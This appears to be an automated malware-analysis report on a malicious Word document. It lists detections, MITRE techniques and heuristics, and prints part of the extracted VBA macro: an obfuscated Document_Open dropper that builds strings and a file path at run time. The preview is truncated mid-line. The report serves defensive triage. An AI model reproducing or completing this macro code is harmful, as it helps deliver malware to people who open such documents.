MALICIOUS
264
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1140 Deobfuscate/Decode Files or Information
The sample is a Microsoft Word document containing VBA macros, specifically a Document_Open macro designed to execute upon opening. It uses a lure to convince the user to enable macros, a common tactic for malware droppers. The macro attempts to deobfuscate and likely execute a payload, as indicated by the CreateObject and GetObject calls and the presence of a large, encoded blob within the macros.bas file.
Heuristics 9
-
ClamAV: Doc.Dropper.Agent-6485293-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6485293-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/cusEIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 272757 bytes |
SHA-256: 8b51181668177f57ac0a541a83597855e4be28398f020b8766c55dde499ef3db |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 210 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "CommandButton1, 1, 0, MSForms, CommandButton" Attribute VB_Control = "TextBox1, 0, 1, MSForms, TextBox" Option Explicit Private Sub CommandButton1_Click() MsgBox " ******* Certificate Failed ******* " End Sub Sub Document_Open() On Error Resume Next Dim aXSe, AFhP, kIMD As String aXSe = BlvR(TJgm) AFhP = BlvR(YSCe) kIMD = BlvR(hkYa) Dim XpGP As String XpGP = ucaS(ThNz(144, 195)) XpGP = wjZJ(XpGP, ucaS(ThNz(58, 89))) XpGP = wjZJ(XpGP, ucaS(ThNz(28, 110))) XpGP = wjZJ(XpGP, ucaS(ThNz(7, 110))) XpGP = wjZJ(XpGP, ucaS(ThNz(186, 202))) XpGP = wjZJ(XpGP, ucaS(ThNz(29, 105))) XpGP = wjZJ(XpGP, ucaS(ThNz(7, 110))) XpGP = wjZJ(XpGP, ucaS(ThNz(59, 85))) XpGP = wjZJ(XpGP, ucaS(ThNz(231, 128))) XpGP = wjZJ(XpGP, ucaS(ThNz(93, 115))) XpGP = wjZJ(XpGP, ucaS(ThNz(106, 44))) XpGP = wjZJ(XpGP, ucaS(ThNz(7, 110))) XpGP = wjZJ(XpGP, ucaS(ThNz(41, 69))) XpGP = wjZJ(XpGP, ucaS(ThNz(243, 150))) XpGP = wjZJ(XpGP, ucaS(ThNz(144, 195))) XpGP = wjZJ(XpGP, ucaS(ThNz(182, 207))) XpGP = wjZJ(XpGP, ucaS(ThNz(60, 79))) XpGP = wjZJ(XpGP, ucaS(ThNz(29, 105))) XpGP = wjZJ(XpGP, ucaS(ThNz(243, 150))) XpGP = wjZJ(XpGP, ucaS(ThNz(92, 49))) XpGP = wjZJ(XpGP, ucaS(ThNz(206, 129))) XpGP = wjZJ(XpGP, ucaS(ThNz(47, 77))) XpGP = wjZJ(XpGP, ucaS(ThNz(36, 78))) XpGP = wjZJ(XpGP, ucaS(ThNz(243, 150))) XpGP = wjZJ(XpGP, ucaS(ThNz(58, 89))) XpGP = wjZJ(XpGP, ucaS(ThNz(29, 105))) Dim zXJA As String zXJA = aXSe Dim lgvA As String lgvA = "" lgvA = wjZJ(lgvA, ucaS(ThNz(214, 149))) lgvA = wjZJ(lgvA, ucaS(ThNz(163, 153))) lgvA = wjZJ(lgvA, "\") lgvA = wjZJ(lgvA, ucaS(ThNz(223, 143))) lgvA = wjZJ(lgvA, ucaS(ThNz(28, 110))) lgvA = wjZJ(lgvA, ucaS(ThNz(214, 185))) lgvA = wjZJ(lgvA, ucaS(ThNz(231, 128))) lgvA = wjZJ(lgvA, ucaS(ThNz(28, 110))) lgvA = wjZJ(lgvA, ucaS(ThNz(210, 179))) lgvA = wjZJ(lgvA, ucaS(ThNz(92, 49))) lgvA = wjZJ(lgvA, ucaS(ThNz(31, 91))) lgvA = wjZJ(lgvA, ucaS(ThNz(210, 179))) lgvA = wjZJ(lgvA, ucaS(ThNz(29, 105))) lgvA = wjZJ(lgvA, ucaS(ThNz(210, 179))) lgvA = wjZJ(lgvA, "\") lgvA = wjZJ(lgvA, ucaS(ThNz(146, 197))) lgvA = wjZJ(lgvA, ucaS(ThNz(7, 110))) lgvA = wjZJ(lgvA, ucaS(ThNz(59, 85))) lgvA = wjZJ(lgvA, ucaS(ThNz(34, 70))) lgvA = wjZJ(lgvA, ucaS(ThNz(214, 185))) lgvA = wjZJ(lgvA, ucaS(ThNz(45, 90))) lgvA = wjZJ(lgvA, ucaS(ThNz(60, 79))) lgvA = wjZJ(lgvA, ucaS(ThNz(31, 91))) lgvA = wjZJ(lgvA, ucaS(ThNz(243, 150))) lgvA = wjZJ(lgvA, ucaS(ThNz(251, 157))) lgvA = wjZJ(lgvA, ucaS(ThNz(243, 150))) lgvA = wjZJ(lgvA, ucaS(ThNz(59, 85))) lgvA = wjZJ(lgvA, ucaS(ThNz(34, 70))) lgvA = wjZJ(lgvA, ucaS(ThNz(243, 150))) lgvA = wjZJ(lgvA, ucaS(ThNz(28, 110))) lgvA = wjZJ(lgvA, ucaS(ThNz(144, 195))) lgvA = wjZJ(lgvA, ucaS(ThNz(243, 150))) lgvA = wjZJ(lgvA, ucaS(ThNz(28, 110))) lgvA = wjZJ(lgvA, ucaS(ThNz(92, 42))) lgvA = wjZJ(lgvA, ucaS(ThNz(7, 110))) lgvA = wjZJ(lgvA, ucaS(ThNz(58, 89))) lgvA = wjZJ(lgvA, ucaS(ThNz(243, 150))) lgvA = wjZJ(lgvA, ucaS(ThNz(93, 115))) lgvA = wjZJ(lgvA, ucaS(ThNz(7, 110))) lgvA = wjZJ(lgvA, ucaS(ThNz(59, 85))) lgvA = wjZJ(lgvA, ucaS(ThNz(7, 110))) iFUN lgvA, zXJA, XpGP Dim ZCmJ As String ZCmJ = "" ZCmJ = wjZJ(ZCmJ, ucaS(ThNz(214, 149))) ZCmJ = wjZJ(ZCmJ, ucaS(ThNz(163, 153))) ZCmJ = wjZJ(ZCmJ, "\") ZCmJ = wjZJ(ZCmJ, ucaS(ThNz(223, 143))) ZCmJ = wjZJ(ZCmJ, ucaS(ThNz(28, 110))) ZCmJ = wjZJ(ZCmJ, ucaS(ThNz(214, 185))) ZCmJ = wjZJ(ZCmJ, ucaS(ThNz(231, 128))) ZCmJ = wjZJ(ZCmJ, ucaS(ThNz(28, 110))) ZCmJ = wjZJ(ZCmJ, ucaS(ThNz(210, 179))) ZCmJ = wjZJ(ZCmJ, ucaS(ThNz(92, 49))) ZCmJ = wjZJ(ZCmJ, ucaS(ThNz(31, 91))) ZCmJ = wjZJ(ZCmJ, ucaS(ThNz(210, 179))) ZCmJ = wjZJ(ZCmJ, ucaS(ThNz(29, 105))) ZCmJ = wjZJ(ZCmJ, ucaS(ThNz(210, 179))) ZCmJ = wjZJ(ZCmJ, "\") ZCmJ = wjZJ(ZCmJ, ucaS(ThNz(124, 57))) ZCmJ = wjZJ(ZCmJ, ucaS(ThNz(92, 4 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.